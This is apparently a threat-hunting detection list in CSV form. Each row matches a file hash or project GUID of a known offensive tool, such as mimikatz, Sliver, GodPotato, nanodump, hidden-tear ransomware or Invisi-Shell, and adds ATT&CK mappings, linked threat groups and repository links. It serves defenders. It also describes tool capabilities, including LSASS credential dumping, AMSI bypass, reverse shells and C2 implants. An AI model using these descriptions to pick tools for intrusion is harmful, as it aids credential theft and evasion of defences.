"*828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92*",".{0,1000}828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30055" 
"*828c2d6318c0f827de40468b1bccf68a33851bd78d2dd218fb008f3928250d42*",".{0,1000}828c2d6318c0f827de40468b1bccf68a33851bd78d2dd218fb008f3928250d42.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","30056" "*828cd34ca798170da015728e4e85b2e6367ea3fac93946c0684ac643794ff3fb*",".{0,1000}828cd34ca798170da015728e4e85b2e6367ea3fac93946c0684ac643794ff3fb.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30057" "*8299345196309b9e228c921f059aafbfdb9f0420253215aaf531309b1aded71d*",".{0,1000}8299345196309b9e228c921f059aafbfdb9f0420253215aaf531309b1aded71d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30059" "*829fc9a7c5aa66169fef3d816c6d1b6811a2d2f6ba89dbb5abc4a46e8dca82d7*",".{0,1000}829fc9a7c5aa66169fef3d816c6d1b6811a2d2f6ba89dbb5abc4a46e8dca82d7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30061" "*82ab77802f301f210cd9368128c3ac453fb62f53af88fa912b411dcc3a9f8c0d*",".{0,1000}82ab77802f301f210cd9368128c3ac453fb62f53af88fa912b411dcc3a9f8c0d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30063" "*82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d*",".{0,1000}82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","#filehash","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","30064" "*82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3*",".{0,1000}82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30066" "*82B0EE92-347E-412F-8EA2-CBDE683EDA57*",".{0,1000}82B0EE92\-347E\-412F\-8EA2\-CBDE683EDA57.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","#GUIDproject","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","30067" "*82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194*",".{0,1000}82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30070" 
"*82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63*",".{0,1000}82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30071" "*82C19CBA-E318-4BB3-A408-5005EA083EC5*",".{0,1000}82C19CBA\-E318\-4BB3\-A408\-5005EA083EC5.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#GUIDproject","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","30072" "*82c7500571fe91c65c7d8a1eb771581a0f2ab73e35a91241fc14062fccdcd711*",".{0,1000}82c7500571fe91c65c7d8a1eb771581a0f2ab73e35a91241fc14062fccdcd711.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30074" 
"*82cff3a5c17a0c205a4b60bbcaa8f10494ba5bd0d38445e1227d65f944acd922*",".{0,1000}82cff3a5c17a0c205a4b60bbcaa8f10494ba5bd0d38445e1227d65f944acd922.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30075" "*82d331f75a99d1547e0ccc3c3efd0a7a*",".{0,1000}82d331f75a99d1547e0ccc3c3efd0a7a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","30077" "*82d3a3d0a5004b0079166839cdc9c570a6d861954f62f50d22053206a298c5f9*",".{0,1000}82d3a3d0a5004b0079166839cdc9c570a6d861954f62f50d22053206a298c5f9.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","30078" "*82d7b3b02f63138b68de51799ba42b9402ed8c9d899d5c0ea1797ff19e921685*",".{0,1000}82d7b3b02f63138b68de51799ba42b9402ed8c9d899d5c0ea1797ff19e921685.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30079" 
"*82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153*",".{0,1000}82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30080" "*82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76*",".{0,1000}82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - 
menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30082" "*82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76*",".{0,1000}82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30083" "*82ee96364fb2e2a1b96550fb3aff0e104b32eaaf1728c84a4a02a9a60b8cdb54*",".{0,1000}82ee96364fb2e2a1b96550fb3aff0e104b32eaaf1728c84a4a02a9a60b8cdb54.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","30087" "*82f1a23dfcbcf483940976e8cc71e3e3ebd71df0b37a66319973e2ed178e597b*",".{0,1000}82f1a23dfcbcf483940976e8cc71e3e3ebd71df0b37a66319973e2ed178e597b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30088" "*82F417BE-49BF-44FF-9BBD-64FECEA181D7*",".{0,1000}82F417BE\-49BF\-44FF\-9BBD\-64FECEA181D7.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#GUIDproject","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","30089" "*82f53311c29da5884441a1dc621dc7087dc1b0e343ec160ed26c0fff4eadfe1f*",".{0,1000}82f53311c29da5884441a1dc621dc7087dc1b0e343ec160ed26c0fff4eadfe1f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30090" "*830023999e063bef7fd09709d0aa3e34eb0cce2dacd382f381350e8890b20dee*",".{0,1000}830023999e063bef7fd09709d0aa3e34eb0cce2dacd382f381350e8890b20dee.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 
100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","30093" "*83027372a543334309f8f262ede34349db3a09ff2ac4ab143c465a27c274d90a*",".{0,1000}83027372a543334309f8f262ede34349db3a09ff2ac4ab143c465a27c274d90a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30094" "*83035080-7788-4EA3-82EE-6C06D2E6891F*",".{0,1000}83035080\-7788\-4EA3\-82EE\-6C06D2E6891F.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","#GUIDproject","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","30095" "*83049a99591f84b7f50db732ccc8412b4e9b6e3bb188c00790880342d1e94cf0*",".{0,1000}83049a99591f84b7f50db732ccc8412b4e9b6e3bb188c00790880342d1e94cf0.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30096" "*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*",".{0,1000}8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack 
it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","30097" "*830b926cbf6925eb0af2d99551ffe92613ce3da9b5a52292959df6c41ba93cd5*",".{0,1000}830b926cbf6925eb0af2d99551ffe92613ce3da9b5a52292959df6c41ba93cd5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30098" "*830df06f247546d342e1eb6cf13d214ea05a7bc89806c844cfe46efcb1227420*",".{0,1000}830df06f247546d342e1eb6cf13d214ea05a7bc89806c844cfe46efcb1227420.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30100" "*8310f53135ddcc2e6b9fd6ca2aca3662f61dc1b5fb2b2510fa762e5862afcf94*",".{0,1000}8310f53135ddcc2e6b9fd6ca2aca3662f61dc1b5fb2b2510fa762e5862afcf94.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","30102" "*831d70eff6225d3ca5ed5723f7d17c5b7f7f7aaad583e6b0a7d8dd99cdcde755*",".{0,1000}831d70eff6225d3ca5ed5723f7d17c5b7f7f7aaad583e6b0a7d8dd99cdcde755.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30105" "*831d87d48fde985447d82a0dbde6a720ecb4c882e28af0bde713b6b340e5b8e3*",".{0,1000}831d87d48fde985447d82a0dbde6a720ecb4c882e28af0bde713b6b340e5b8e3.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","30106" "*8337460fcc31ae6781de16482287810dcefc051e15cd18a28af46654b3ab7b4b*",".{0,1000}8337460fcc31ae6781de16482287810dcefc051e15cd18a28af46654b3ab7b4b.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30110" 
"*833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf*",".{0,1000}833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","30111" "*8340cdf3b69ba92b47803f75eabb102d35454ef9676702ff1742c7136d9608de*",".{0,1000}8340cdf3b69ba92b47803f75eabb102d35454ef9676702ff1742c7136d9608de.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","0","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","30112" "*8347E81B-89FC-42A9-B22C-F59A6A572DEC*",".{0,1000}8347E81B\-89FC\-42A9\-B22C\-F59A6A572DEC.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#GUIDproject","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","30114" "*8347E81B-89FC-42A9-B22C-F59A6A572DEC*",".{0,1000}8347E81B\-89FC\-42A9\-B22C\-F59A6A572DEC.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. 
Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","#GUIDproject","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","30115" "*8347E81B-89FC-42A9-B22C-F59A6A572DEC*",".{0,1000}8347E81B\-89FC\-42A9\-B22C\-F59A6A572DEC.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30116" "*83536b1df51e5954c757179b70419fe5567df58f3ed029998e6ca82f7c0a15a7*",".{0,1000}83536b1df51e5954c757179b70419fe5567df58f3ed029998e6ca82f7c0a15a7.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","30117" "*835544862f1683ef3996a1b9653a0daf1937d2cdd973004e4fa5003fef54a893*",".{0,1000}835544862f1683ef3996a1b9653a0daf1937d2cdd973004e4fa5003fef54a893.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","30118" "*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","30120" "*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
